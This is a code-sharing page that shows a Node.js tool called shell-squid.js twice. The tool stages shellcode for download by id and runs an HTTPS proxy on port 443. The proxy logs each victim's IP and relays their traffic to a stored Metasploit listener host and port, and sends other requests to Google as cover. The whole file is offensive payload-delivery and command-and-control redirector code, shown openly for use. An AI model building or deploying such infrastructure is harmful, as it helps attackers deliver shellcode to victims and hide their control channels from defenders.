coderarity/shell-squid.js Secret

## shell-squid.js
// Copyright (c) 2012 Tom Steele
// See the file license.txt for copying permission
var fs = require('fs');
var express = require('express');
var redis = require('redis');
var config = require('configure');
var httpProxy = require('http-proxy');
var https = require('https');

if (!config) {
  console.log('no config found');
  process.exit(1);
}

httpsOptions = {
  key: fs.readFileSync(config.ssl.key),
  cert: fs.readFileSync(config.ssl.cert)
};

app = express();
app.use(express.bodyParser());

// connect to redis
var client = redis.createClient();
client.on('error', function(err, reply) {
  if (err.toString() === 'Error: Redis connection to 127.0.0.1:6379 failed - connect ECONNREFUSED') {
    console.log('Error connecting to redis server');
    console.log(err);
    process.exit(1);
  }
    console.log('Error', err);
});


function buildPayload(name) {
    return 123;
}

function buildRedis(name) {
    return 1234;
}

// pull shellcode from redis and update remoteip
app.get('/dl/:id', function(req, res) {
  var id = req.param('id');
  if (!id) {
    res.json(200, { error: 'no id provided' });
  }

  client.hget(id, 'shellcode', function(err, reply) {
    if (err) {
      console.log('Error', err);
      res.send('none');
    }
    res.send(reply);
  });
});

app.get('/delete/:id', function(req, res) {
  // delete all associated data
  res.json(200, {response: "success"});
});

// generates a random id and sets up redis
app.post('/generate', function(req, res) {
  var name = req.param('name');
  var shellcode = req.param('shellcode');
  var lport = req.param('lport');
  var lhost = req.param('lhost');

  if (!name) {
    res.json(200, { error: 'no name given' });
    return;
  }

  if (!shellcode) {
    res.json(200, { error: 'no shellcode provied' });
    return;
  }

  if (!lhost) {
    res.json(200, { error: 'no lhost provied' });
    return;
  }
  var newId = Math.floor(Math.random() * 1000000);
  client.set(name, newId, function(err, reply) {
    if (err) {
      console.log(err);
      res.json({ error: err });
    }
  });

  client.hmset(newId, "name", name, "shellcode", shellcode, "ip", '', "lhost", lhost, "lport", lport);
  res.json({ id: newId });

});

// start the https api server
var webPort = 8443;
if (config.webport) {
  webPort = config.webport;
}
https.createServer(httpsOptions, app).listen(webPort);
console.log('Express service listening on', webPort);

// create and manage the https proxy server
// port is not configurable
https.createServer(httpsOptions, function (req, res) {
  var proxyHost = 'www.google.com';
  var proxyPort = 443;
  var url = req.url;
  var sourceIp = req.connection.remoteAddress;
  var buffer = httpProxy.buffer(req);
  console.log('connection from', sourceIp);
  console.log('requesting', url);

  if (url.match('/dl/([0-9]{1,7})')) {
    var id = url.match('dl/([0-9]{1,7})')[1];
    client.hset(id, 'ip', sourceIp);
    client.hset(sourceIp, 'id', id);
    proxyHost = 'localhost';
    proxyPort= webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/generate.*')) {
    proxyHost = 'localhost';
    proxyPort = webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/[a-z-A-Z]+')) {
    // lookup the metasploit ip and port based of source ip
    client.hget(sourceIp, 'id', function (err, reply) {
      if (err) {
        console.log('Error', err);
      }
      client.hgetall(reply, function(err, obj) {
        if (err) {
          console.log('Error', err);
        }
        proxyHost = obj.lhost;
        proxyPort = obj.lport;
        handleIt(proxyHost, proxyPort);
      });
    });
  }

  function handleIt(ph, pp) {
    var proxy = new httpProxy.HttpProxy({
        target: {
          host: ph,
          port: pp,
          https: true,
          rejectUnauthorized: false,
          buffer: buffer
        }
    });
    proxy.proxyRequest(req, res);
  }

}).listen(443);
console.log('Proxy server listening on 443')
	// Copyright (c) 2012 Tom Steele
	// See the file license.txt for copying permission
	var fs = require('fs');
	var express = require('express');
	var redis = require('redis');
	var config = require('configure');
	var httpProxy = require('http-proxy');
	var https = require('https');

	if (!config) {
	console.log('no config found');
	process.exit(1);
	}

	httpsOptions = {
	key: fs.readFileSync(config.ssl.key),
	cert: fs.readFileSync(config.ssl.cert)
	};

	app = express();
	app.use(express.bodyParser());

	// connect to redis
	var client = redis.createClient();
	client.on('error', function(err, reply) {
	if (err.toString() === 'Error: Redis connection to 127.0.0.1:6379 failed - connect ECONNREFUSED') {
	console.log('Error connecting to redis server');
	console.log(err);
	process.exit(1);
	}
	console.log('Error', err);
	});


	function buildPayload(name) {
	return 123;
	}

	function buildRedis(name) {
	return 1234;
	}

	// pull shellcode from redis and update remoteip
	app.get('/dl/:id', function(req, res) {
	var id = req.param('id');
	if (!id) {
	res.json(200, { error: 'no id provided' });
	}

	client.hget(id, 'shellcode', function(err, reply) {
	if (err) {
	console.log('Error', err);
	res.send('none');
	}
	res.send(reply);
	});
	});

	app.get('/delete/:id', function(req, res) {
	// delete all associated data
	res.json(200, {response: "success"});
	});

	// generates a random id and sets up redis
	app.post('/generate', function(req, res) {
	var name = req.param('name');
	var shellcode = req.param('shellcode');
	var lport = req.param('lport');
	var lhost = req.param('lhost');

	if (!name) {
	res.json(200, { error: 'no name given' });
	return;
	}

	if (!shellcode) {
	res.json(200, { error: 'no shellcode provied' });
	return;
	}

	if (!lhost) {
	res.json(200, { error: 'no lhost provied' });
	return;
	}
	var newId = Math.floor(Math.random() * 1000000);
	client.set(name, newId, function(err, reply) {
	if (err) {
	console.log(err);
	res.json({ error: err });
	}
	});

	client.hmset(newId, "name", name, "shellcode", shellcode, "ip", '', "lhost", lhost, "lport", lport);
	res.json({ id: newId });

	});

	// start the https api server
	var webPort = 8443;
	if (config.webport) {
	webPort = config.webport;
	}
	https.createServer(httpsOptions, app).listen(webPort);
	console.log('Express service listening on', webPort);

	// create and manage the https proxy server
	// port is not configurable
	https.createServer(httpsOptions, function (req, res) {
	var proxyHost = 'www.google.com';
	var proxyPort = 443;
	var url = req.url;
	var sourceIp = req.connection.remoteAddress;
	var buffer = httpProxy.buffer(req);
	console.log('connection from', sourceIp);
	console.log('requesting', url);

	if (url.match('/dl/([0-9]{1,7})')) {
	var id = url.match('dl/([0-9]{1,7})')[1];
	client.hset(id, 'ip', sourceIp);
	client.hset(sourceIp, 'id', id);
	proxyHost = 'localhost';
	proxyPort= webPort;
	handleIt(proxyHost, proxyPort);
	}
	else if (url.match('/generate.*')) {
	proxyHost = 'localhost';
	proxyPort = webPort;
	handleIt(proxyHost, proxyPort);
	}
	else if (url.match('/[a-z-A-Z]+')) {
	// lookup the metasploit ip and port based of source ip
	client.hget(sourceIp, 'id', function (err, reply) {
	if (err) {
	console.log('Error', err);
	}
	client.hgetall(reply, function(err, obj) {
	if (err) {
	console.log('Error', err);
	}
	proxyHost = obj.lhost;
	proxyPort = obj.lport;
	handleIt(proxyHost, proxyPort);
	});
	});
	}

	function handleIt(ph, pp) {
	var proxy = new httpProxy.HttpProxy({
	target: {
	host: ph,
	port: pp,
	https: true,
	rejectUnauthorized: false,
	buffer: buffer
	}
	});
	proxy.proxyRequest(req, res);
	}

	}).listen(443);
	console.log('Proxy server listening on 443')